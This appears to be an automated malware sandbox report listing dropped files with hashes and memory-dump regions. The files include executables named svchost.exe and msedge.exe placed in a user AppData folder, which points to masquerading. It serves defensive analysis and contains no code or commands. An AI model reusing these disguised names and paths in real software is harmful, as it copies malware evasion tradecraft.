C:\Users\Admin\AppData\Local\Temp\sBJBM.cpl
Filesize
1.4MB

MD5
0d252e0b9151f27dde3c1aafd5bfe86e

SHA1
b2987e440920b248907d6d98f17c091250d864ad

SHA256
2cee59d85b162709249a6a0f8a9da2bcc5ed0cab570dc82be42f9f3b24a4d70d

SHA512
438a87655ea510badf85a1970b9bd18e3fed074dc9de67278ff0652456ade29af7afa773c32551c24cf9aa04d804d716c414fd01d24905f8b5248a5e2d42d36c

Download Submit
C:\Users\Admin\AppData\Local\Temp\sBJBM.cpl
Filesize
1.4MB

MD5
0d252e0b9151f27dde3c1aafd5bfe86e

SHA1
b2987e440920b248907d6d98f17c091250d864ad

SHA256
2cee59d85b162709249a6a0f8a9da2bcc5ed0cab570dc82be42f9f3b24a4d70d

SHA512
438a87655ea510badf85a1970b9bd18e3fed074dc9de67278ff0652456ade29af7afa773c32551c24cf9aa04d804d716c414fd01d24905f8b5248a5e2d42d36c

Download Submit
C:\Users\Admin\AppData\Local\Temp\sBJBM.cpl
Filesize
1.4MB

MD5
0d252e0b9151f27dde3c1aafd5bfe86e

SHA1
b2987e440920b248907d6d98f17c091250d864ad

SHA256
2cee59d85b162709249a6a0f8a9da2bcc5ed0cab570dc82be42f9f3b24a4d70d

SHA512
438a87655ea510badf85a1970b9bd18e3fed074dc9de67278ff0652456ade29af7afa773c32551c24cf9aa04d804d716c414fd01d24905f8b5248a5e2d42d36c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp3AB7.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp3AB7.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp3AB7.tmp.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
Filesize
16KB

MD5
e8ac4929d4ef413e3c45abe2531cae95

SHA1
9ccd6320f053402699c802425e395010ef915740

SHA256
7245d7d5573bfbd93e7939ad685b071d7755ebb62d8411f1984ce9dcc195f588

SHA512
be3e14f1441839001f41f7c62ce3a5b7fb26927a0d8cd532eab7d000382e143b4f5b5468a60f6223dfecae3d4ad556a7f72b7e5d318783fc1d1858241bfb93e7

Download Submit
C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
Filesize
16KB

MD5
e8ac4929d4ef413e3c45abe2531cae95

SHA1
9ccd6320f053402699c802425e395010ef915740

SHA256
7245d7d5573bfbd93e7939ad685b071d7755ebb62d8411f1984ce9dcc195f588

SHA512
be3e14f1441839001f41f7c62ce3a5b7fb26927a0d8cd532eab7d000382e143b4f5b5468a60f6223dfecae3d4ad556a7f72b7e5d318783fc1d1858241bfb93e7

Download Submit
C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe
Filesize
8.1MB

MD5
51ff42d909a879d42eb5f0e643aab806

SHA1
affce62499d0f923f115228643a87ba5daece4e5

SHA256
c0e187a0974b337fe6990e9a929c472dcf491282b8171322291a0ed6c1c653c3

SHA512
bc948edfb59e58cc7f9a4c8e9052989e8d655323f79b29ac1a0ae5152bffd0847f8838091a51a33ffd0d1414b5afeed34870587931801f47da1ecff8915f9baf

Download Submit
C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe
Filesize
8.1MB

MD5
51ff42d909a879d42eb5f0e643aab806

SHA1
affce62499d0f923f115228643a87ba5daece4e5

SHA256
c0e187a0974b337fe6990e9a929c472dcf491282b8171322291a0ed6c1c653c3

SHA512
bc948edfb59e58cc7f9a4c8e9052989e8d655323f79b29ac1a0ae5152bffd0847f8838091a51a33ffd0d1414b5afeed34870587931801f47da1ecff8915f9baf

Download Submit
memory/60-239-0x0000000002680000-0x00000000027DF000-memory.dmp

Filesize
1.4MB

Download
memory/60-241-0x0000000002680000-0x00000000027DF000-memory.dmp

Filesize
1.4MB

Download
memory/60-247-0x0000000002990000-0x0000000002A39000-memory.dmp

Filesize
676KB

Download
memory/60-245-0x0000000000A10000-0x0000000000A16000-memory.dmp

Filesize
24KB

Download
memory/60-246-0x00000000028D0000-0x000000000298F000-memory.dmp

Filesize
764KB

Download
memory/60-236-0x0000000000000000-mapping.dmp

Download
memory/888-139-0x00000000012F8000-0x00000000012FA000-memory.dmp

Filesize
8KB

Download
memory/888-133-0x00000000013C5000-0x00000000013D8000-memory.dmp

Filesize
76KB

Download
memory/1508-219-0x0000000000000000-mapping.dmp

Download
memory/1508-232-0x0000000002FE0000-0x0000000003089000-memory.dmp

Filesize
676KB

Download
memory/1508-230-0x0000000002F10000-0x0000000002FCF000-memory.dmp

Filesize
764KB

Download
memory/1508-226-0x0000000000FC0000-0x0000000000FC6000-memory.dmp

Filesize
24KB

Download
memory/1508-181-0x0000000000000000-mapping.dmp

Download
memory/1508-222-0x0000000000400000-0x000000000055F000-memory.dmp

Filesize
1.4MB

Download
memory/1792-180-0x00000000009CF000-0x00000000009D5000-memory.dmp

Filesize
24KB

Download
memory/1792-178-0x0000000000000000-mapping.dmp

Download
memory/1852-213-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmp

Filesize
10.8MB

Download
memory/1852-202-0x0000000000000000-mapping.dmp

Download
memory/1852-227-0x00000227E43D0000-0x00000227E4B76000-memory.dmp

Filesize
7.6MB

Download
memory/1852-228-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmp

Filesize
10.8MB

Download
memory/1852-206-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmp

Filesize
10.8MB

Download
memory/1852-205-0x0000021FC57A0000-0x0000021FC57A6000-memory.dmp

Filesize
24KB

Download
memory/2256-200-0x0000000000000000-mapping.dmp

Download
memory/2956-188-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmp

Filesize
10.8MB

Download
memory/2956-210-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmp

Filesize
10.8MB

Download
memory/2956-231-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmp

Filesize
10.8MB

Download
memory/2956-216-0x000000001DD90000-0x000000001DDE0000-memory.dmp

Filesize
320KB

Download
memory/2956-187-0x00000000004E0000-0x0000000000556000-memory.dmp

Filesize
472KB

Download
memory/2956-184-0x0000000000000000-mapping.dmp

Download
memory/2956-214-0x000000001E9F0000-0x000000001EBB2000-memory.dmp

Filesize
1.8MB

Download
memory/3304-235-0x0000000000000000-mapping.dmp

Download
memory/3304-197-0x0000000000000000-mapping.dmp

Download
memory/4052-215-0x000000001E650000-0x000000001EB78000-memory.dmp

Filesize
5.2MB

Download
memory/4052-171-0x0000000002330000-0x0000000002342000-memory.dmp

Filesize
72KB

Download
memory/4052-170-0x000000001CB10000-0x000000001CC1A000-memory.dmp

Filesize
1.0MB

Download
memory/4052-169-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmp

Filesize
10.8MB

Download
memory/4052-207-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmp

Filesize
10.8MB

Download
memory/4052-208-0x000000001DD00000-0x000000001DD76000-memory.dmp

Filesize
472KB

Download
memory/4052-168-0x0000000000220000-0x000000000029E000-memory.dmp

Filesize
504KB

Download
memory/4052-229-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmp

Filesize
10.8MB

Download
memory/4052-212-0x000000001CC20000-0x000000001CC3E000-memory.dmp

Filesize
120KB

Download
memory/4052-165-0x0000000000000000-mapping.dmp

Download
memory/4052-174-0x000000001CC60000-0x000000001CC9C000-memory.dmp

Filesize
240KB

Download
memory/4084-132-0x0000000000000000-mapping.dmp

Download
memory/4104-158-0x0000000000000000-mapping.dmp

Download
memory/4140-217-0x0000000000000000-mapping.dmp

Download
memory/4160-159-0x0000000000000000-mapping.dmp

Download
memory/4228-138-0x0000000000400000-0x0000000000407000-memory.dmp

Filesize
28KB

Download
memory/4228-136-0x0000000000000000-mapping.dmp

Download
memory/4228-157-0x0000000000400000-0x0000000000407000-memory.dmp

Filesize
28KB

Download
memory/4448-162-0x0000000000000000-mapping.dmp

Download
memory/4544-143-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/4544-144-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/4544-151-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/4544-137-0x0000000000000000-mapping.dmp

Download
memory/4544-140-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/4544-142-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/4764-148-0x0000000000D60000-0x0000000000D96000-memory.dmp

Filesize
216KB

Download
memory/4764-147-0x0000000000000000-mapping.dmp

Download
memory/4764-153-0x0000000000D60000-0x0000000000D96000-memory.dmp

Filesize
216KB

Download
memory/4764-156-0x0000000000D60000-0x0000000000D96000-memory.dmp

Filesize
216KB

Download
memory/4944-193-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmp

Filesize
10.8MB

Download
memory/4944-189-0x0000000000000000-mapping.dmp

Download
memory/4944-192-0x0000000000B50000-0x0000000000BA2000-memory.dmp

Filesize
328KB

Download
memory/4944-211-0x00007FFDE3F50000-0x00007FFDE4A11000-memory.dmp

Filesize
10.8MB

Download
memory/5004-194-0x0000000000000000-mapping.dmp

Download
memory/5024-172-0x0000000000000000-mapping.dmp

Download